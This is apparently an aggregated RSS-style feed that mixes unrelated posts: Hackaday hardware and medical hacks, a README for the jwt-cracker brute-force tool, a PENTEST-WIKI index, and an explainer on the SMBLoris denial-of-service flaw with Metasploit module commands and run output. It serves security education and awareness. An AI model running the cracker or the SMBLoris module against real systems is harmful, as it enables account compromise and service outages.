jwt-cracker – Simple HS256 JWT Token Brute Force Cracker

Simple HS256 JWT token brute force cracker.

Effective only for cracking JWT tokens with weak secrets.

Recommendation: Use strong, long secrets or RS256 tokens.

Install
With npm:

npm install --global jwt-cracker

Usage
From command line:

jwt-cracker <token> [<alphabet>] [<maxLength>]

Where:

token: the full HS256 JWT token string to crack

alphabet: the alphabet to use for the brute force (default: "abcdefghijklmnopqrstuwxyzABCDEFGHIJKLMNOPQRSTUWXYZ0123456789")

maxLength: the max length of the string generated during the brute force (default: 12)

Requirements
This script requires Node.js version 6.0.0 or higher.

Example
Cracking the default jwt.io example:

jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

It takes about 2 hours on a MacBook Pro (2.5GHz quad-core Intel Core i7).
Download jwt-cracker

http://ift.tt/2wxokhz http://ift.tt/2aM8QhC

Condom and Catheter Team up to Save New Mothers’ Lives

The title is sure to draw a snicker from some readers, but the purpose of this field-expedient treatment for postpartum hemorrhage is deadly serious, and a true medical hack that has the potential to save the lives of new mothers.

Postpartum hemorrhage is the leading cause of death during pregnancy, claiming about 86,000 women every year. While it can occur up to six weeks after giving birth, PPH is most serious immediately after delivery and can require aggressive treatment to prevent hypovolemic shock and eventual death. A fully equipped obstetrical suite will have access to an array of medications and devices to staunch the flow, including a uterine balloon tamponade (UBT) kit. But at $400 a kit, these devices are hard to come by in the developing world.

Not to be dissuaded, midwife [Anne Mulinge] from Nairobi, Kenya created a simple, cheap substitute using common items. A common urinary catheter is covered with an ordinary condom, the end of which is secured around the catheter with twine. Once inserted into the woman’s uterus, the condom is filled with saline solution through the catheter, expanding the condom and applying direct pressure to the bleeding uterine walls. The pressure allows the mother’s clotting mechanism to catch up with the decreased blood flow.

So far, [Anne] claims the device has saved three new mothers, and other midwives are being trained in the technique. Here’s hoping that more lives are saved with this simple hack, and perhaps with this more complex one designed to get blood to remote clinics as fast as possible.

Filed under: Medical hacks http://ift.tt/2vEhBFQ http://ift.tt/2aM8QhC

Researchers Put Windows Defender in a Sandbox to Show Microsoft How It’s Done

Software experts from Trail of Bits, a well-known security R&D company, have sandboxed Windows Defender, the default antivirus solution that ships with recent Windows editions. […] http://ift.tt/2vEhfiT http://ift.tt/2aM8QhC

PENTEST-WIKI: free online security knowledge library for pentesters/researchers – Penetration Testing

PENTEST-WIKI is a free online security knowledge library for pentesters / researchers. If you have a good idea, please share it with others.

Contents

Network Analysis

IP

Whois

DNS

Identify Live Hosts

IDS/IPS Identification

Web Application

Web Application Fingerprint

CMS Identification

Open Source Analysis

IDS/IPS Identification

OSINT

GHDB

People

Pictures

Media

Company

Document

Vulnerability Scanners

Network Assessment

Web Application Assessment

Database Assessment

MongoDB

MySQL

Postgresql

Sqlite

Mobile Assessment

Android

Network Exploitation

Vulnerable Ports List

Cisco ASA CVE-2016-6366

OS Exploitation

Windows

Windows 2008 Active Directory Hacking

Windows 2012 Credentials dump

Metasploit – run vbs payload in cmd.exe

Windows Vssadmin

Web Exploitation

Database Exploitation

Wireless Exploitation

Social Engineering

Physical Exploitation

Open Source Exploitation

Password Attacks

Privilege Escalation Media

Windows Privilege Escalation Fundamentals

Basic Linux Privilege Escalation

Protocol Analysis

Spoofing Analysis

OS Backdoors

Tunneling

Web Backdoors

Public pentesting reports

Penetration Testing Books

Hackers Handbook Series

Defensive Development

Network Analysis Books

Reverse Engineering Books

Malware Analysis Books

Windows Books

Social Engineering Books

Lock Picking Books

OSINT Books

Flick

Nebula

NullByte-1

FTP

HTTP

Download

The post PENTEST-WIKI: free online security knowledge library for pentesters/researchers appeared first on Penetration Testing.

http://ift.tt/2vDGmlC http://ift.tt/2aM8QhC

A New Battery For A Potted Clock Module

If you did much dismantling of PCs back in the 1980s and 1990s, you might be familiar with the Dallas Semiconductor range of potted real-time clock modules. These were chunky dual-in-line devices containing clock and non-volatile RAM chips, a crystal, and a lithium battery. The battery was good for about a decade, which was fine for most PCs of the day because the majority of desktop computers are replaced long before that deadline.

[Glitch], however, has an industrial single-board computer with a 486 processor whose working life has been much longer than that of its desktop siblings because of its application. The battery in the onboard Dallas DS1387 expired long ago, and since these devices have been out of production for so long that replacements are unavailable, he has had to improvise.

Improving on some previous documented projects he found through an internet search, he carefully ground away the potting compound to reveal a couple of the battery conductors, cut them with a PCB drill, and mounted a lithium cell holder on the top of the device with some tidily soldered Kynar wires to bring in the power. A CR1225 cell was used rather than the ubiquitous CR2032, as space was at a premium in the width of the ISA card form factor.

The potted RTC module is something of a rare device these days, but if you have a retro computer containing one this seems to be a very useful piece of work to bring it back to life. We’ve covered another similar one with a slightly larger battery in the past.

Filed under: classic hacks http://ift.tt/2hz9HaN http://ift.tt/2aM8QhC

Fidget Spinner Shreds with Bass Guitar Pickup

Hackaday continues to embrace our implacable spinning overlords-of-the-heart.

[zazzazzero] posted a YouTube video showing him fidgeting one of those spinners that had been hooked up to a bass guitar pickup. It makes a rather awesome rumbling sound as the pickup registers the bearings rolling around, and when hooked up to a Digidelay effects pedal he moved it beyond the rumble to more of an industrial growl like a factory hum. He also got interesting sounds by tapping on the spinner with a screwdriver.

Then he switched up to using an iPad audio app called Shaper to modify the resulting sound far beyond what he had before, with more effects options available at the touch of a button. All of these sounds can be modulated into the analog synthesizer chain, making this spinner a for-reals musical instrument.

We’ve published more than a couple pieces on music hacking, including this ADSR envelope generator project and the Atom Smasher guitar pedal.

[thanks, km4yri]

Filed under: musical hacks, toy hacks http://ift.tt/2vtI9Jx http://ift.tt/2aM8QhC

SMBLoris Denial of Service Metasploit Module – Penetration Testing

What is SMBLoris?

SMBLoris is a remote and uncredentialed denial of service attack against Microsoft® Windows® operating systems, caused by a 20+ year old vulnerability in the Server Message Block (SMB) network protocol implementation.

What versions of Windows are affected?

The vulnerability is in all modern versions of Windows, at least from Windows 2000 through Windows 10. Systems are still vulnerable even if all versions of SMB (1, 2, and 3) are disabled.

What is the threat?

It is computationally inexpensive for an attacker to cause large memory allocations and enormous amounts of wasted CPU cycles†, rendering vulnerable machines completely unusable, making business-critical services (such as web and mail servers) unavailable, and even causing the entire operating system to crash.

Scenario            Sockets    Attack Cost‡   Memory Impact
Baseline            1          4 bytes        128 KiB
Single IPv4         65,535     256 KiB        8 GiB
Single IPv6         65,535     256 KiB        8 GiB
Dual IPv4 / IPv6    131,070    512 KiB        16 GiB
10 IPs              655,535    2.5 MiB        80 GiB

† CPU impact cannot be meaningfully measured, but is generally quite significant.

‡ Attack cost is measured by how many bytes of TCP data an attacker must send over the network.
It does not include standard network headers, which are also small overhead for the attacker.

Is there a CVE?

SMBLoris has not (yet?) been assigned a CVE. Some similar vulnerabilities include:

CVE-2012-5568

MS09-048 (CVE-2009-1925 and CVE-2009-1926)

CVE-2008-4609

CVE-2007-6750

Is there a patch?

Not at this time.

What ports are affected?

Generally, SMB runs on port 445. The NetBIOS service on port 139 is probably also exploitable.

auxiliary/dos/smb/smb_loris Metasploit Module

This module exploits a vulnerability in the NetBIOS Session Service header for SMB.
Any Windows machine with SMB exposed, or any Linux system running Samba, is vulnerable.
See the SMBLoris page for details on the vulnerability.

The module opens over 64,000 connections to the target service, so please make sure
your system's ulimit is set high enough to handle that many open sockets. A single host
running this module can theoretically consume up to 8GB of memory on the target.

Verification Steps

Example steps (these are also in the PR):

Start msfconsole

Do: use auxiliary/dos/smb/smb_loris

Do: set RHOST [IP]

Do: run

Target should allocate increasing amounts of memory.

msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >

msf auxiliary(smb_loris) > run

[*] 192.168.172.138:445 – Sending packet from Source Port: 1025
[*] 192.168.172.138:445 – Sending packet from Source Port: 1026
[*] 192.168.172.138:445 – Sending packet from Source Port: 1027
[*] 192.168.172.138:445 – Sending packet from Source Port: 1028
[*] 192.168.172.138:445 – Sending packet from Source Port: 1029
[*] 192.168.172.138:445 – Sending packet from Source Port: 1030
[*] 192.168.172.138:445 – Sending packet from Source Port: 1031
[*] 192.168.172.138:445 – Sending packet from Source Port: 1032
[*] 192.168.172.138:445 – Sending packet from Source Port: 1033
...

Source: Github

The post SMBLoris Denial of Service Metasploit Module appeared first on Penetration Testing.

http://ift.tt/2vtYlui http://ift.tt/2aM8QhC

Ink-Filled Machine Badges Score Respect for Your Gear

Remember the good old days when machines had a stout metal badge instead of cheap vinyl decals, and nameplates on motors were engraved in metal rather than printed on a label with a QR code? Neither do we, but these raised brass labels with color filled backgrounds look great, they’re surprisingly easy to make, and just the thing your gear needs to demand respect as a cherished piece of gear.

The ‘easy’ part of this only comes if you have access to a machine shop like [John] at NYC CNC does. To be fair, the only key machine for making these plates is a laser cutter, and even a guy like [John] needed to farm that out. The process is very straightforward — a brass plate is cleaned and coated with lacquer, which is then removed by the laser in the areas that are to be etched. The plate is dipped in an electrolyte solution for etching, cleaned, and powder coated. After curing the powder coat with a heat gun rather than an oven — a tip worth the price of admission by itself — the paint is sanded off the raised areas, the metal is polished, and a clear coat applied to protect the badge.

Plates like these would look great for a little retro-flair on a new build like this Nixie power meter, or allow you to restore a vintage machine like this classic forge blower.

Filed under: laser hacks, misc hacks http://ift.tt/2fiOUHF http://ift.tt/2aM8QhC